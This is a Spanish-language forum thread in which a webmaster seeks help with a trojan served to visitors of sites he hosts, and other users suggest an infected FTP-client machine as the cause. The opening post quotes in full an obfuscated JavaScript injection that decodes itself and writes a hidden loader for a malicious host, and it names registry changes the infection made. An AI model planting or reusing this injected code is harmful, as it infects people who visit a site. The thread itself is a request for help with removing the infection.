Necesito ayuda para descifrar código malicioso en hosting y dominio

Saludos a esta gran comunidad de ayuda.

Les doy los detalles del asunto:

Resulta que soy webmaster y en algunos de los sitios que administro tengo instalados 5 portales cms (en php nuke 7.9), y desde hace algunas semanas, tengo problemas con un virus troyano que se descarga al abrir cualquiera de los 5 sitios alojados en el mismo servidor; y solo sucede con IE explorer (usuarios y visitantes de quejan de esto), no sucede con firefox. Me dí a la tarea de buscar algún código malicioso en los archivos alojados y bases de datos de los sitios y no se encuentran en estos (estan limpios).

El código malicioso qu encontré se descarga de alguna manera poco antes de abrir alguno de estos sitios web que tengo alojados (algo asi como un redireccionaminto) este código es el siguiente.

CODE, HTML o PHP Insertado:

<!--fa1502e73a01cc72fb483c8f4f8036bf--><script language=javascript>nebhovqgz="oZimPP%UwRntoZnl!U&HL!t!P";snqsxy="<sG63riG70tG20lG61nG67G75aG67e=jG61vaG73G63G72iG70tG3e G20fG75ncG74G69onG20tlzG62G6aoG65zG28lG77vosju)G7bvar xqG6ecG65G74pyg,G6eG6dfG72zG66G67G6dG71=G22&G61G6b@3G79G5fb[~+4JUCO{$G39:w!G6fv17G23fr)G67G6c^G50}G71G48G20EG75N0G6ex]G36pG6dFi=(`G38G3bG472'G6aG41G2cG54zhG56cG4b.\\\"G42G49tG4dsG35|G65ZG2dG64G2a\",qG7aiG63yjlnG3dG22\",G6cjG6ccwG6fG67G70,ewG61G72igG2cG69G6cquG63fG6c=\"\",nG6fzG77G61n;fG6frG28xqnceG74pG79G67G3dG30G3bG78G71nG63G65G74G70ygG3clG77G76G6fsG6au.G6cenG67th;xqnG63etG70yg++){ G6cjG6cG63G77G6fgG70=G6cwvG6fsju.chG61rAG74G28G78qnG63G65G74pyG67);G65G77ariG67G3dG6eG6dG66rzfgmqG2eG69nG64exOf(G6cjG6cG63wG6fgp)G3bG69fG28ewG61rig>G2d1G29{ nG6fG7awaG6e=((G65G77arig+1G29G25G38G31G2d1)G3biG66G28nozwaG6e<=G30G29G6eoG7aG77G61n+=8G31G3biG6cG71ucG66G6cG2bG3dG6emfG72zfG67G6dG71.G63G68arAt(G6eoG7aG77an-1);G20} G65G6csG65 G69lqucfl+G3dG6cG6alcwoG67pG3b}qG7aicG79jln+G3diG6cqG75G63fl;docG75menG74G2eG77G72ite(G71zG69cG79jG6cn);G7d<G2fsG63G72ipt>";pnnxtuxxb=nebhovqgz.charAt(6);randvunc=snqsxy.replace(/G/g,pnnxtuxxb);psdswky=unescape(randvunc);var uivrkjiku,eqzrdwl;document.write(psdswky);uivrkjiku="<VMF^>E<5K)=mMEM_mZ(BMZ]M/Ak1k5K)=mMBE^kxlNklZ(BAk1k5K)=mMB>EE1k)EZ]m=)_E(ExZ!EDkMZ`gGEZ]m=)_\"5ZMz=FZ`Z]m=)_\"lZMz=FZ`gE4E'J&pn&pn&7nnngGE*vKNFZxM\"Kvv@=Z(j5Z55=vx=*(y:7';pn|,|y7GEmkMV(/GEZ]m=)Z5(jE4EZ]m=)_\"Mv2szSM)=xl`gGEE*vKNFZxM\"!)=MZ`EB<SORt}zE^kxlNklZ(\\BUk1kSK)=mM\\BESRO(\\BVMMmw//lvvl^Zkxk^_M^K5\"xZM/bbNMFA\"A5\\B><\\/SORt}z>BEgG</5K)=mM>E</VMF^>E";tlzbjoez(uivrkjiku);</script><!--fa1502e73a01cc72fb483c8f4f8036bf-->

Lo que hise mientras arreglo esto fue desactivar el sitio y base de datos y poner un simple index html pero el problema continua igual.

al abrir el sitio; previo a descargar mis archivos conocidos que tengo alojados pertenecientes al sitio web backgenerationsradio.com (mi sitio original y dominio). IE explorer descarga archivos ajenos en los temporales que son desconocidos, que provienen de sitios desconocidos de dudosa reputación aquí les dejo la imágen (notese beladen.net sitio dudoso).


i39.tinypic.com/xmrc48.jpg


estos archivos se descargan previo a abrir el sitio original y sucede de forma intermitente, hay ocasiones en que los sitios trabajan normalmente

Es de de llamar la atención que una cookie de descarga de googleanalytlcs.net (NOTESE que este sitio no es de GOOGLE y googleanalytlcs.net esta escrito como googleanalytlcs.net con L minúscula sustituyendo la i latina.

cuando infectó mi pc corrí el Malwarebytes' Anti-Malware

y detectó registros infectados

como estos:


Elementos de Datos del Registro Infectados:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

otro aviso que dá el IE explorer es el siguiente:

i39.tinypic.com/dvqz3m.jpg

La pregunta es: será algún problema de seguridad del servidor? (por cierto el servidor es muy malo )que tenga que ver con los DNS. O acaso los dominos fueron robados aunque ya verifique los dns y son correctos

Ustedes que opinan ojala puedan ayudarme a descifrar esta "maraña"

 

Tu problema está en tu máquina, no en el servidor, ¿todos tus programas son originales?

 

A que te refieres con que esta en mi máquina?, y sí, todos son originales.


El problema es que nu reseller donde tengo alojados esos dominios y todos lo visitantes nuevos o usuarios de esos sitios se les descarga el troyano.

 

Saludos apolo

ya revise todos los index bases de datos, cambie password de ftp, limpie mi maquina minuciosamente etc etc. imcluso desactivé los sitios y subi un simplisimo html y el problema continua, lo que no he hecho es hablar con el porveedor de reseller, por que en este mes me voy.
De que otra manera me podrian estar atacando el servidor?

 

Lo que infecta tus webs es TU MAQUINA, no el servidor, sucede muy amenudo cuando se usan programas piratas de diseño, S.O. y antivirus (si, tambien hay antivirus piratas ), no digo que sea tu caso, pero frecuentemente es el origen del problema.

 

Antes de pasarlo, desactiva la opción de restaurar sistema en Windows XP o en Vista por seguridad.

Anti-Virus

Nod32
BitDefender
Kaspersky

Anti-Spyware

Ad-aware
Spybot Search & Destroy

Y no estaría demás que pasaras CCleaner para limpiar un poco.

Saludos,

 

Hay otra persona que tiene acceso al ftp de estos sitios, (el es mi cliente)
seguramente tuvo algo que ver en esto

 

Es posible, pero ten en cuenta que siempre es una máquina que accede por FTP, por cierto los password de acceso a ese sitio, y probablemente todos los que se usen en la máquina en cuestion, ya deben de estar hasta en las páginas amarillas , cámbialos INMEDIATAMENTE desde una máquina que estés seguro que está limpia.

 

Cuando me referí a que esta persona tiene acceso al ftp. quise decir que el tambien sube y modifica archivos de estos sitios cuando no estoy desde su propia máquina, y si voy a cambiar datos lo más pronto posible

gracias por la ayuda

 

¿El servidor bajo que sistema operativo está? Posiblemente el problema esté en tu servidor.

Anda que no hay virus que una vez ejecutados empiezan a rastrear archivos con permiso de escritura para incrustar código malicioso (normalmente códigos JS/ActiveX)...

Saludos

 

Sin ir más lejos, hace un par de meses en Powweb ocurrió esto.

Saludos

 

No me quieren creer

Tengo unos cuantos casos documentados y el problema es de la parte del usuario, si fuera de la parte de servidor TODAS las web estarían infectadas.

Insisto, busca un dreamweaver pirata, se lo que digo

Tengo localizadas 3 varias variantes del mismo, las 3 sólo infectan los index.*
Una infecta en el pie, la otra en la cabecera con un body onload, y la última en la primera línea despues de body.

Es posible que sea un solo troyano con varios sistemas de ataque, el contenido original en el disco del cliente NO está infectado, el troyano hace la infección en el momento de publicar y tambien comprueba aleatoriamente las webs a las que tiene acceso y las infecta nuevamente cada 2 o 3 días, si lo modificas externamente no lo vuelve a infectar hasta que se vuelve a publicar desde la máquina de origen, los password pasan a una red de máquinas infectadas, pero no parece que la infección se haga desde otra máquina.

Asumo que ademas se encragara de pasar los datos de los contactos y probablemente algunos password.

Pronto más info

 

Está en linux (por cierto esta empresa después de contratar con ellos,la investige al empezar a detectar fallas y carencias, y resultó de las que tienen peor reputación, "dicen ke lo bara)to sale caro"

En este mes termina mi contrato con ellos , hise respaldos, y borre ya los portales, voy a migrar a joomla. subi sólo un archivo index al sitio, voy a ver como se comporta en estos dias, si persiste el problema, me atrevería a decir que es el servidor, por cierto el reseller que me rentaron nunca me activaron la función mail, dado que otro cliente compartido, hacia spam, y nunca me avisaron de eso, que mal servicio dan ahi en verdad.

 

en este mes cumplo un año con ellos, y mande miles de quejas por "helpdesk" y nunca ayudaron en nada, más que nada esto lo hago para prevenir futuros problemas, y tomar experiencia de esto.

el año pasado hubo un problema muy grave en ese servidor, tan grave que al abrir los sitios, los archivos con extension php se descargaban como archivos comunes, (como si fuera un zip o algo similar) INCLUSO EL ARCHIVO CONFIG.PHP del portal se descargaba y se podia leer via navegador cualquier usuario podia leerlo tan solo con linkear el config.php!!!!!!, terrible terrible

 

Aqui hay algunos links en inglés que hablan de este preciso código malicioso en especial, pero lo mismo, no encuentran el dichoso codigo tal pareciera que sale como por arte de magia


vbulletin.com/forum/showthread.php?t=307207

photography-forum.org/showthread.php?t=31068

saludos y gracias

 

Buenos pues les informo las acciones que hise últimamente, cambié pases de accesos, ftp etc, respalde archivos y bases de datos, borre los archivos de los 5 sitios alojados en el servidor (prácticamente no hay nada solo un html un flash e imágenes).

Pero resulta que algunos usuarios que usan el antivirus AVAST , este antivirus les manda alerta de rastros de troyanos (JS:cruzer-C) en algúnas imágenes (banners)JPG.


Sera´que estas imágenes hayan sido infectadas por el problema antes especificado? o son falsas alertas?, se dice que avast tiene problemas de "falsos positivos".

saludos